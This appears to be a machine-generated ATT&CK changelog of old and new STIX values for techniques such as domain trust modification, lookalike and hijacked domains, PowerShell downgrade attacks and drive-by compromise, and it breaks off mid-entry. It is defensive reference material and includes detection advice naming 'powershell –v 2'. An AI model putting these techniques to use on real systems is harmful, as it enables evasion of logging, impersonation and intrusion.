| external_references[3]['description'] | Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019. | Microsoft. (2009, October 7). Trust Technologies. Retrieved February 14, 2019. |
| external_references[3]['url'] | http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ | https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10) |
| external_references[4]['source_name'] | Microsoft Operation Wilysupply | Microsoft GetAllTrustRelationships |
| external_references[4]['description'] | Florio, E.. (2017, May 4). Windows Defender ATP thwarts Operation WilySupply software supply chain cyberattack. Retrieved February 14, 2019. | Microsoft. (n.d.). Domain.GetAllTrustRelationships Method. Retrieved February 14, 2019. |
| external_references[4]['url'] | https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/ | https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships |
| external_references[5]['source_name'] | Microsoft GetAllTrustRelationships | Harmj0y Domain Trusts |
| external_references[5]['description'] | Microsoft. (n.d.). Domain.GetAllTrustRelationships Method. Retrieved February 14, 2019. | Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019. |
| external_references[5]['url'] | https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships | https://posts.specterops.io/a-guide-to-attacking-domain-trusts-971e52cb2944 |
| x_mitre_data_sources[2] | Process: OS API Execution | Network Traffic: Network Traffic Content |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | ExtraHop | |
| x_mitre_data_sources | Process: OS API Execution |
| Old Description | New Description |
|---|---|
| Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. | Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-01-11 18:21:20.213000+00:00 | 2022-10-21 16:09:14.555000+00:00 |
| description | Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. | Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) |
| external_references[1]['source_name'] | Microsoft - Azure AD Federation | CISA SolarWinds Cloud Detection |
| external_references[1]['description'] | Microsoft. (2018, November 28). What is federation with Azure AD?. Retrieved December 30, 2020. | CISA. (2021, January 8). Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments. Retrieved January 8, 2021. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed | https://us-cert.cisa.gov/ncas/alerts/aa21-008a |
| external_references[2]['source_name'] | Microsoft - Azure Sentinel ADFSDomainTrustMods | AADInternals zure AD Federated Domain |
| external_references[2]['description'] | Microsoft. (2020, December). Azure Sentinel Detections. Retrieved December 30, 2020. | Dr. Nestori Syynimaa. (2017, November 16). Security vulnerability in Azure AD & Office 365 identity federation. Retrieved September 28, 2022. |
| external_references[2]['url'] | https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml | https://o365blog.com/post/federation-vulnerability/ |
| external_references[3]['source_name'] | Sygnia Golden SAML | Microsoft - Azure AD Federation |
| external_references[3]['description'] | Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021. | Microsoft. (2018, November 28). What is federation with Azure AD?. Retrieved December 30, 2020. |
| external_references[3]['url'] | https://www.sygnia.co/golden-saml-advisory | https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed |
| external_references[4]['source_name'] | CISA SolarWinds Cloud Detection | Microsoft - Azure Sentinel ADFSDomainTrustMods |
| external_references[4]['description'] | CISA. (2021, January 8). Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments. Retrieved January 8, 2021. | Microsoft. (2020, December). Azure Sentinel Detections. Retrieved December 30, 2020. |
| external_references[4]['url'] | https://us-cert.cisa.gov/ncas/alerts/aa21-008a | https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml |
| x_mitre_data_sources[0] | Active Directory: Active Directory Object Creation | Active Directory: Active Directory Object Modification |
| x_mitre_data_sources[1] | Active Directory: Active Directory Object Modification | Active Directory: Active Directory Object Creation |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Sygnia Golden SAML', 'description': 'Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021.', 'url': 'https://www.sygnia.co/golden-saml-advisory'} | |
| x_mitre_contributors | Praetorian |
| Old Description | New Description |
|---|---|
| Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. Adversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016) Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1) | Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering) Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Bob Sullivan. (2000, July 24). PayPal alert! Beware the 'PaypaI' scam. Retrieved March 2, 2017. |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-630 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 17:09:26.334000+00:00 | 2022-10-18 19:21:38.441000+00:00 |
| description | Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. Adversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016) Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1) | Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering) Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1) |
| external_references[1]['source_name'] | capec | PaypalScam |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/630.html | https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/ |
| external_references[2]['source_name'] | CISA MSS Sep 2020 | CISA IDN ST05-016 |
| external_references[2]['description'] | CISA. (2020, September 14). Alert (AA20-258A): Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. Retrieved October 1, 2020. | CISA. (2019, September 27). Security Tip (ST05-016): Understanding Internationalized Domain Names. Retrieved October 20, 2020. |
| external_references[2]['url'] | https://us-cert.cisa.gov/ncas/alerts/aa20-258a | https://us-cert.cisa.gov/ncas/tips/ST05-016 |
| external_references[3]['source_name'] | FireEye APT28 | CISA MSS Sep 2020 |
| external_references[3]['description'] | FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015. | CISA. (2020, September 14). Alert (AA20-258A): Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. Retrieved October 1, 2020. |
| external_references[3]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf | https://us-cert.cisa.gov/ncas/alerts/aa20-258a |
| external_references[4]['source_name'] | PaypalScam | bypass_webproxy_filtering |
| external_references[4]['description'] | Bob Sullivan. (2000, July 24). PayPal alert! Beware the 'PaypaI' scam. Retrieved March 2, 2017. | Fehrman, B. (2017, April 13). How to Bypass Web-Proxy Filtering. Retrieved September 20, 2019. |
| external_references[4]['url'] | https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/ | https://www.blackhillsinfosec.com/bypass-web-proxy-filtering/ |
| external_references[5]['source_name'] | CISA IDN ST05-016 | FireEye APT28 |
| external_references[5]['description'] | CISA. (2019, September 27). Security Tip (ST05-016): Understanding Internationalized Domain Names. Retrieved October 20, 2020. | FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015. |
| external_references[5]['url'] | https://us-cert.cisa.gov/ncas/tips/ST05-016 | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf |
| external_references[6]['source_name'] | Mandiant APT1 | Domain_Steal_CC |
| external_references[6]['description'] | Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016. | Krebs, B. (2018, November 13). That Domain You Forgot to Renew? Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019. |
| external_references[6]['url'] | https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf | https://krebsonsecurity.com/2018/11/that-domain-you-forgot-to-renew-yeah-its-now-stealing-credit-cards/ |
| external_references[7]['source_name'] | ThreatConnect Infrastructure Dec 2020 | tt_obliqueRAT |
| external_references[7]['description'] | ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021. | Malhotra, A., McKay, K. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal . Retrieved July 29, 2022. |
| external_references[7]['url'] | https://threatconnect.com/blog/infrastructure-research-hunting/ | https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html |
| x_mitre_data_sources[0] | Domain Name: Active DNS | Domain Name: Domain Registration |
| x_mitre_data_sources[2] | Domain Name: Domain Registration | Domain Name: Active DNS |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'tt_httrack_fake_domains', 'description': 'Malhotra, A., Thattil, J. et al. (2022, March 29). Transparent Tribe campaign uses new bespoke malware to target Indian government officials . Retrieved September 6, 2022.', 'url': 'https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html'} | |
| external_references | {'source_name': 'Mandiant APT1', 'description': 'Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.', 'url': 'https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf'} | |
| external_references | {'source_name': 'Categorisation_not_boundary', 'description': 'MDSec Research. (2017, July). Categorisation is not a Security Boundary. Retrieved September 20, 2019.', 'url': 'https://www.mdsec.co.uk/2017/07/categorisation-is-not-a-security-boundary/'} | |
| external_references | {'source_name': 'Redirectors_Domain_Fronting', 'description': 'Mudge, R. (2017, February 6). High-reputation Redirectors and Domain Fronting. Retrieved July 11, 2022.', 'url': 'https://www.cobaltstrike.com/blog/high-reputation-redirectors-and-domain-fronting/'} | |
| external_references | {'source_name': 'lazgroup_idn_phishing', 'description': 'RISKIQ. (2017, December 20). Mining Insights: Infrastructure Analysis of Lazarus Group Cyber Attacks on the Cryptocurrency Industry. Retrieved July 29, 2022.', 'url': 'https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/'} | |
| external_references | {'source_name': 'httrack_unhcr', 'description': 'RISKIQ. (2022, March 15). RiskIQ Threat Intelligence Roundup: Campaigns Targeting Ukraine and Global Malware Infrastructure. Retrieved July 29, 2022.', 'url': 'https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/'} | |
| external_references | {'source_name': 'ThreatConnect Infrastructure Dec 2020', 'description': 'ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.', 'url': 'https://threatconnect.com/blog/infrastructure-research-hunting/'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/630.html', 'external_id': 'CAPEC-630'} | |
| x_mitre_contributors | Oleg Kolesnikov, Securonix | |
| x_mitre_contributors | Menachem Goldstein |
| Old Description | New Description |
|---|---|
| Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps. Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020) | Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019) Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Jeremy Galloway'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 15:51:26.715000+00:00 | 2022-04-20 14:10:48.814000+00:00 |
| description | Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps. Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020) | Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019) Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020) |
| external_references[1]['source_name'] | ICANNDomainNameHijacking | Krebs DNS Hijack 2019 |
| external_references[1]['description'] | ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017. | Brian Krebs. (2019, February 18). A Deep Dive on the Recent Widespread DNS Hijacking Attacks. Retrieved February 14, 2022. |
| external_references[1]['url'] | https://www.icann.org/groups/ssac/documents/sac-007-en | https://krebsonsecurity.com/2019/02/a-deep-dive-on-the-recent-widespread-dns-hijacking-attacks/ |
| external_references[2]['source_name'] | Microsoft Sub Takeover 2020 | ICANNDomainNameHijacking |
| external_references[2]['description'] | Microsoft. (2020, September 29). Prevent dangling DNS entries and avoid subdomain takeover. Retrieved October 12, 2020. | ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017. |
| external_references[2]['url'] | https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover | https://www.icann.org/groups/ssac/documents/sac-007-en |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Microsoft Sub Takeover 2020', 'description': 'Microsoft. (2020, September 29). Prevent dangling DNS entries and avoid subdomain takeover. Retrieved October 12, 2020.', 'url': 'https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover'} |
| Old Description | New Description |
|---|---|
| Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018) Adversaries may downgrade and use less-secure versions of various features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014) | Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging) Adversaries may downgrade and use less-secure versions of various features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Mayuresh Dani, Qualys', 'Daniel Feichter, @VirtualAllocEx, Infosec Tirol'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 00:48:06.723000+00:00 | 2022-05-19 16:28:31.041000+00:00 |
| description | Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018) Adversaries may downgrade and use less-secure versions of various features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014) | Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging) Adversaries may downgrade and use less-secure versions of various features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014) |
| external_references[2]['source_name'] | Mandiant BYOL 2018 | att_def_ps_logging |
| external_references[2]['description'] | Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 8, 2021. | Hao, M. (2019, February 27). Attack and Defense Around PowerShell Event Logging. Retrieved November 24, 2021. |
| external_references[2]['url'] | https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique | https://nsfocusglobal.com/attack-and-defense-around-powershell-event-logging/ |
| external_references[3]['source_name'] | Praetorian TLS Downgrade Attack 2014 | inv_ps_attacks |
| external_references[3]['description'] | Praetorian. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved October 8, 2021. | Hastings, M. (2014, July 16). Investigating PowerShell Attacks. Retrieved December 1, 2021. |
| external_references[3]['url'] | https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/ | https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/ |
| x_mitre_data_sources[0] | Command: Command Execution | Process: Process Metadata |
| x_mitre_data_sources[1] | Process: Process Metadata | Command: Command Execution |
| x_mitre_detection | Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: powershell –v 2). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment. |
Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: powershell –v 2). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment.
Monitor for Windows event ID (EID) 400, specifically the EngineVersion field which shows the version of PowerShell running and may highlight a malicious downgrade attack.(Citation: inv_ps_attacks) |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Mandiant BYOL 2018', 'description': 'Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 8, 2021.', 'url': 'https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique'} | |
| external_references | {'source_name': 'Praetorian TLS Downgrade Attack 2014', 'description': 'Praetorian. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved October 8, 2021.', 'url': 'https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/'} |
| Old Description | New Description |
|---|---|
| Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Multiple ways of delivering exploit code to a browser exist, including: * A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting. * Malicious ads are paid for and served through legitimate ad providers. * Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content). Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise) Typical drive-by compromise process: 1. A user visits a website that is used to host the adversary controlled content. 2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog 